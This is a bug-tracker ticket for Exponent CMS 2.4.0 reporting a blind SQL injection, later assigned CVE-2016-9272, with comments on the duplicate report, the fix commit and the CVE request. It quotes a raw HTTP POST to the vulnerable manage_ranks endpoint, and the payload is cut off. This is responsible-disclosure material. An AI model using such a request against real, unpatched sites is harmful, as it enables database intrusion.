#1394 ✓resolved
Nicky

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (4)

Reported by Nicky | November 6th, 2016 @ 07:46 AM | in 2.4.1 (closed)

POST /exponent/ HTTP/1.1
Content-Length: 268
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.118.1:80/exponent/
Cookie: PHPSESSID=4b42cc8b7f69ebe1afdcbf4abbfee00b; adminer_key=cdeaea5d52a8f402a28bd04980a7851b
Host: 192.168.118.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /

action=manage_ranks&controller=container&lastpage=http://192.168.118.1/exponent/untitled&model=container&rera...

Comments and changes to this ticket

  • dleffler

    dleffler November 6th, 2016 @ 10:50 AM

    • Assigned user changed from “expNinja” to “dleffler”
    • Milestone set to 2.4.1

    Appears to be a duplicate of #1395

  • expNinja

    expNinja November 6th, 2016 @ 10:53 AM

    • State changed from “new” to “resolved”

    (from [fffb2038de4c603931b785a4c3ec69cfd06181ba]) fix sql injection security vulnerability; reported by Nicky [#1394 state:resolved] [#1395 state:resolved] https://github.com/exponentcms/exponent-cms/commit/fffb2038de4c6039...

  • Nicky

    Nicky November 9th, 2016 @ 03:13 AM

    Hi
    Can you help me to apply for a CVEID this vulnerability?

  • dleffler

    dleffler November 9th, 2016 @ 03:46 AM

    Please visit http://cve.mitre.org/cve/request_id.html, I've not had much success since they've changed reporting methods from email submission to form submission.

  • Nicky

    Nicky November 11th, 2016 @ 06:20 AM

    Hi,
    I have successfully applied for a CVEID(CVE-2016-9272) for this SQL injection vulnerability.

    Credit:Nicky of Tencent Security Platform Department

    Thank you.

  • FillipYang

Please Sign in or create a free account to add a new ticket.

With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.

New-ticket Create new ticket

Create your profile

Help contribute to this project by taking a few moments to create your personal profile. Create your profile »

Bug Tracker for Exponent CMS

Shared Ticket Bins

People watching this ticket

Referenced by

Pages